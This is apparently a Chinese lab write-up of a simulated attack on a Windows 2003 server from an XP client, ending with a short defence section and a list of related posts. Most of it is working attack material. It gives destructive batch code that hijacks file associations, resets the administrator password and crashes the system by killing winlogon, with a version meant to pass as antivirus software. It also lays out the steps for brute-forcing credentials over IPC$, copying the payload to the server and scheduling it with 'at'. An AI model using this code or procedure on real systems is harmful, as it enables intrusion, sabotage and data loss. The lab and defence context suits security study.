针对win2003服务器的恶意代码攻击

目录

    • 针对win2003服务器的恶意代码攻击
  • 实验环境
  • 恶意代码语言构建与解释:
    • 关键命令语句解释:
      • 交互式:
      • 非交互式:
  • 实验过程:
    • #配置网段和IP,使其相互ping通
    • 使用ntscan扫描以及暴力破解服务器账户与密码
    • 将恶意代码植入2003服务器
    • 控制目标主机自动运行恶意代码
    • 退出登录,攻击结束
  • 漏洞分析与防御
    • IPC$
    • 密码设置
    • 管理员权限

摘要:
再本次实验中,利用批处理语言写出一个简单的脚本恶意代码,按照功能与使用场景不同,分成了交互时和非交互式两个版本,交互式版本可以伪装成杀毒软件,诱导Windows2003服务器管理者运行.非交互式可以通过客户机windowsXP进行远程攻击Windows2003服务器,过程如下:
1.配置网段与IPIPIP地址,使其相互pingpingping通
2.利用445端口漏洞,XP通过ntscan工具对2003进行扫描端口以及管理员密码暴力破解.
3.根据得到的管理员帐号和密码通过XP命令行命令与目标主机2003建立IPC$
4.将恶意代码植入目标主机2003
5.通过net\ time等指令远程控制目标主机2003定时运行恶意代码.
6.运行结束,删除日志,退出登录
最后,总结了本次攻击过程中利用的漏洞,以及给出了防御方法与建议.

实验环境

所有实验过程在Vmware虚拟机进行,使用两个操作统,Windows2003作为服务器,为被攻击方.WindowsXP为客户机,为攻击方.操作系统信息如下:

  • 2003

  • xp

恶意代码语言构建与解释:

关键命令语句解释:

 `//注意:由于批处理语句在latex环境中识别错误,//所以为方便注释,将原本正确的注释格式::改成了C语言注释格式//
assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
ping -n 2 127.0.0.1>nul//利用ping命令,起到延时作用,同时隐藏输出
set /p num=输入密码是: //用户输入密码,同时赋值到num变量中
if "%num%"=="123" goto case1 //条件判断,进行跳转
if  not "%num%"=="123" goto case2:case1 //跳转语句入口
assoc .txt=txtfile>nul //进行修复
assoc .exe=exefile>nul
assoc .jpg=jpgfile>nul
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,
//会强制杀死winlogon进程,使系统重启,同时出现蓝屏`

交互式:

为了隐藏代码文件,将bat文件转换成exe程序,运行时结果如下:

  1. 文件破坏:

  2. 输入密码正确后,文件修复,自动退出

  3. 密码输入错误后,锁住桌面系统,启动蓝屏炸弹:

非交互式:

bat关键代码及其解释如下:

assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
net user administrator 123//修改服务器开机密码.
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,会强制杀死winlogon进程,使系统重启,同时出现蓝屏

实验过程:

#配置网段和IP,使其相互ping通

  1. 使用Vmnet2网段

  2. P配置

  • Windows2003配置为10.1.1.3:

  • XP配置为10.1.1.1

  1. 相互ping

使用ntscan扫描以及暴力破解服务器账户与密码

  1. 根据用户习惯设置密码字典

  2. 根据用户习惯设置账户名字典

  3. 利用IPC$端口开启暴力破解

将恶意代码植入2003服务器

  1. 登录服务器 net use \\10.1.1.3\ipc$ abc /user:administrator
  2. 植入代码到目标主机的C盘目录 copy d:Non_interactive.exe \\10.1.1.3\c$
  • Windows2003:
  • XP:

控制目标主机自动运行恶意代码

 net time//返回目标主机时间at \\10.1.1.3 XXX c:\Non_interactive.exe//XXX需要填入运行时间,一般比目标主机时间多5分钟at \\10.1.1.3//察看2003运行进程计划表

  • XP:

  • 2003:
    利用修改后的新密码123登陆后,文件已经被破坏:

退出登录,攻击结束

此步骤需要在运行恶意代码之前进行,否则会出现恶意代码运行后,密码改变,无法多用户访问服务器的情况.

 net use \\10.1.1.3\ipc$ /delte //退出登录

漏洞分析与防御

共有三个漏洞与相应建议:

IPC$

通过netstat−annetstat\ -annetstat −an以及netsharenet\ sharenet share可以查看IPC$ 状态,本次攻击利用了445端口开放的漏洞,所以一般情况下,我们需要关闭此端口,以抵御端口扫描与暴力破解.检查与抵御过程如下:

  • 查看IPC$服务,发现已开启,故有漏洞:

  • 关闭此服务:

  • 再次查看,发现已经关闭:

密码设置

管理员密码设计过于简单,应该避开常用密码,尽量使用3/4准则设计密码.

管理员权限

对网络上的运行程序,运行前要慎重,有条件的话,可以运用一些工具查看以下脚本语言,再运行,尽量不要轻易使用管理员权限运行程序.

参考博客:

批处理语言基础
恶意代码参考
远程控制命令

ntscan资源 提取码:qphj
真空密码生成器提取码:c01y

针对win2003服务器的恶意代码攻击相关推荐

  1. [系统安全] 三十一.恶意代码检测(1)恶意代码攻击溯源及恶意样本分析

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  2. FBI针对Tor网络的恶意代码分析

    一.背景 Tor(The Oninon Router)提供一个匿名交流网络平台,它使得用户在浏览网页或访问其它网络服务时不会被跟踪.作为该网络的一部分即所谓的"暗网"(darkne ...

  3. 阿里云服务器被恶意ddos攻击了怎么办?

    服务器被DDoS攻击最恶心,尤其是阿里云的服务器受攻击最频繁,因为黑客都知道阿里云服务器防御低,一但被攻击就会进入黑洞清洗,轻的IP停止半小时,重的停两个至24小时,给网站带来很严重的损失. 处理 d ...

  4. [网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取

    "网络安全提高班"新的100篇文章即将开启,包括Web渗透.内网渗透.靶场搭建.CVE复现.攻击溯源.实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史.换专业确实挺难 ...

  5. 网安--第七章 恶意代码分析与防治

    第7章 恶意代码分析与防治 内容提要 ◎ 恶意代码的发展史和恶意代码长期存在的原因 ◎ 恶意代码实现机理.定义以及攻击方法 ◎ 恶意代码生存技术.隐藏技术,介绍网络蠕虫的定义以及结构 ◎ 恶意代码防范 ...

  6. 安全防御 --- 恶意代码、防病毒

    一.恶意代码 1.按照传播方式分类 (1)病毒 概念: 病毒是一种基于硬件和操作系统的程序,具有感染和破坏能力,这与病毒程序的结构有关.病毒攻击的宿主程序是病毒的栖身地,它是病毒传播的目的地,又是下一 ...

  7. [当人工智能遇上安全] 5.基于机器学习算法的主机恶意代码识别研究

    您或许知道,作者后续分享网络安全的文章会越来越少.但如果您想学习人工智能和安全结合的应用,您就有福利了,作者将重新打造一个<当人工智能遇上安全>系列博客,详细介绍人工智能与安全相关的论文. ...

  8. [系统安全] 三十三.恶意代码检测(3)基于机器学习的恶意代码检测技术

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  9. MS08067 第一期 “恶意代码分析”实战班 正式开班~

    文章来源|MS08067安全实验室 恶意代码分析实战班 恶意代码分析的分类: 恶意代码分析也可作为单独的安全专业类别来看待,不过总体是偏逆向方向的,希望的受众是逆向相关的就行了,比如以前只会逆向但是不 ...

  10. 恶意代码可视化检测技术研究综述

    摘要 随着反检测技术的不断发展,产生了大量形态多样的恶意代码变种,传统检测技术已无法准确检测出该种未知恶意代码.由于数据可视化方法能将恶意代码的核心表现在图像特征中,因此可视化恶意代码检测方法受到越来 ...

最新文章

  1. 选择排序-直接选择排序
  2. [20160223]检查redo日志的完整性.txt
  3. 【机器视觉】 read_measure算子
  4. Jquery$和$$的区别
  5. 根据数据库表gengxin实体类_ASP.NET开发实战——(十二)数据库之EF Migrations
  6. LeetCode 1151. 最少交换次数来组合所有的 1(滑动窗口)
  7. 【伙伴故事】一盏智能灯,点亮家庭和工业照明的新未来
  8. idea超炫的自定义模板
  9. 使用cookies查询商品详情
  10. 如何花式计算20的阶乘?
  11. group by调优的一些测试
  12. 德国外交部为何放弃Linux而改用XP?
  13. CSS如何进行图片定位
  14. 笔记本无线热点共享批处理bat_马立杰_新浪博客
  15. 关于压缩感知的第一篇论文解析压缩感知研究新思路
  16. 关于PCM音频重采样思路及注意事项(频率变换和通道数变换(单通道转双通道))
  17. uniapp vue3版本 引用color-ui的cu-custom组件问题
  18. AI 新技术革命将如何重塑就业和全球化格局?深度解读 UN 报告(中篇)
  19. python整钱兑换零钱_LeetCode 零钱兑换
  20. 人为什么要活着——读《活着》有感

热门文章

  1. PC_溢出概念+判断方法+示例
  2. 小喇叭上面有红叉,显示未插入扬声器或耳机,电脑没声音
  3. 海思AI芯片(35xx):板端运行报错
  4. android系统 vender添加自定义的预编译的应用程序
  5. python人物关系网络图共现_文本分析之制作网络关系图
  6. mysql 插入微信名有特殊字符的问题
  7. 安科瑞企业微电网能效管理平台在某食品加工厂35kV变电站应用分析
  8. 计算机考证决心书怎样写
  9. oppo r11 r11t解BL锁安装面具magisk详细教程
  10. Ubuntu Firefox浏览器安装Flash插件